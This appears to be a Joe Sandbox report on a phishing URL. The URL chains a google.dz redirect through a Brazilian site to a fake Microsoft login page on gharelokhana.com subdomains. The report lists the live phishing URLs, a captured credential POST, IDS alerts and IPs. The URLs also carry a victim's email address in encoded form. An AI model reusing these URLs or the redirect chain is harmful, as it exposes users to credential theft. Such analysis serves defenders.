Edit tour

Windows Analysis Report
https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A

Overview

General Information

Sample URL:	https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A
Analysis ID:	1568519
Infos:

Detection

HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

Yara detected HtmlPhish54

AI detected suspicious Javascript

Detected suspicious crossdomain redirect

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML title does not match URL

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 1084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1960,i,15099251395261125347,16654642057831743536,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
1.3.id.script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
2.2.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
2.5.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
2.4.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
2.3.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security

Suricata Signatures

ETPRO PHISHING JS/PsyduckPockeball Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T17:37:36.569822+0100	2857090	1	Successful Credential Theft Detected	164.92.191.86	443	192.168.2.16	49720	TCP

HTTP traffic detected: POST /?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: fdgfhvcfdgfhhjh.gharelokhana.comConnection: keep-aliveContent-Length: 5335Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://fdgfhvcfdgfhhjh.gharelokhana.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 16:37:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: b0ba47d5-cb94-4ef6-9490-013ce9787601x-ms-ests-server: 2.1.19492.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bfbeb8fd-53cae677.gharelokhana.com/api/report?catId=GW+estsfd+frc"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: access-control-allow-headers:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 16:37:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 30423b1c-36ec-4c2f-b76a-ea6d7b350a01x-ms-ests-server: 2.1.19492.3 - NEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bfbeb8fd-53cae677.gharelokhana.com/api/report?catId=GW+estsfd+frc"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: access-control-allow-headers:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 16:37:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 5b45eabb-e821-4e56-874a-497bdd95a800x-ms-ests-server: 2.1.19492.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bfbeb8fd-53cae677.gharelokhana.com/api/report?catId=GW+estsfd+frc"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: access-control-allow-headers:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 16:38:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 400eccbe-722e-4f4f-80e0-7ab133a3b404x-ms-ests-server: 2.1.19492.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bfbeb8fd-53cae677.gharelokhana.com/api/report?catId=GW+estsfd+frc"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: access-control-allow-headers:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 16:38:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: b1265486-e802-4962-bfed-2d6e38a04600x-ms-ests-server: 2.1.19492.3 - NEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bfbeb8fd-53cae677.gharelokhana.com/api/report?catId=GW+estsfd+frc"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: access-control-allow-headers:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 16:38:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 97c2ccb1-d022-4570-b4ef-85fedb76e900x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bfbeb8fd-53cae677.gharelokhana.com/api/report?catId=GW+estsfd+frc"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: access-control-allow-headers:

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: classification engine

Classification label: mal60.phis.win@18/37@18/6

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1960,i,15099251395261125347,16654642057831743536,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1960,i,15099251395261125347,16654642057831743536,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg	0%	Avira URL Cloud	safe
https://4cd0d823-53cae677.gharelokhana.com/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css	0%	Avira URL Cloud	safe
https://fdgfhvcfdgfhhjh.gharelokhana.com/53cae67791734ecfa3a3af9e4bb972a9/	0%	Avira URL Cloud	safe
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg	0%	Avira URL Cloud	safe
https://alvoradavisual.com.br/favicon.ico	0%	Avira URL Cloud	safe
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico	0%	Avira URL Cloud	safe
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/js/ConvergedError_Core_M3x8o7EaVDaB8GOhHsrPIA2.js	0%	Avira URL Cloud	safe
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergederror_stringcustomizationhelper_a7fa53f8687b4e38205f.js	0%	Avira URL Cloud	safe
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/close_790189870c9543725dc3f5a15fb25e46.svg	0%	Avira URL Cloud	safe
https://4cd0d823-53cae677.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_v1eniakvll_1x20aakd_sg2.js	0%	Avira URL Cloud	safe
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/check_small_48540c930333871c385fcba2c659ccdb.svg	0%	Avira URL Cloud	safe
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergederror_customizationloader_7e45d168059bd2885d00.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fdgfhvcfdgfhhjh.gharelokhana.com	164.92.191.86	true	false	high
c9a6baa9-53cae677.gharelokhana.com	164.92.191.86	true	true	unknown
4cd0d823-53cae677.gharelokhana.com	164.92.191.86	true	false	high
google.dz	172.217.19.195	true	false	high
www.google.com	172.217.17.36	true	false	high
www.google.dz	172.217.19.163	true	false	high
alvoradavisual.com.br	191.252.140.51	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg	true	Avira URL Cloud: safe	unknown
https://www.google.dz/amp/s/alvoradavisual.com.br/yoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A	false		high
https://4cd0d823-53cae677.gharelokhana.com/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css	true	Avira URL Cloud: safe	unknown
https://4cd0d823-53cae677.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_v1eniakvll_1x20aakd_sg2.js	true	Avira URL Cloud: safe	unknown
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico	true	Avira URL Cloud: safe	unknown
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg	true	Avira URL Cloud: safe	unknown
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergederror_stringcustomizationhelper_a7fa53f8687b4e38205f.js	true	Avira URL Cloud: safe	unknown
https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	false		unknown
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/close_790189870c9543725dc3f5a15fb25e46.svg	true	Avira URL Cloud: safe	unknown
https://alvoradavisual.com.br/favicon.ico	false	Avira URL Cloud: safe	unknown
https://www.google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A	false		high
https://alvoradavisual.com.br/yoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A	false		unknown
https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A	false		high
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/js/ConvergedError_Core_M3x8o7EaVDaB8GOhHsrPIA2.js	true	Avira URL Cloud: safe	unknown
https://fdgfhvcfdgfhhjh.gharelokhana.com/53cae67791734ecfa3a3af9e4bb972a9/	true	Avira URL Cloud: safe	unknown
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergederror_customizationloader_7e45d168059bd2885d00.js	true	Avira URL Cloud: safe	unknown
https://4cd0d823-53cae677.gharelokhana.com/shared/1.0/content/images/check_small_48540c930333871c385fcba2c659ccdb.svg	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.19.195	google.dz	United States	15169	GOOGLEUS	false
172.217.17.36	www.google.com	United States	15169	GOOGLEUS	false
191.252.140.51	alvoradavisual.com.br	Brazil	27715	LocawebServicosdeInternetSABR	false
164.92.191.86	fdgfhvcfdgfhhjh.gharelokhana.com	United States	46930	ASN-DPSDUS	false
172.217.19.163	www.google.dz	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568519
Start date and time:	2024-12-04 17:36:49 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.win@18/37@18/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
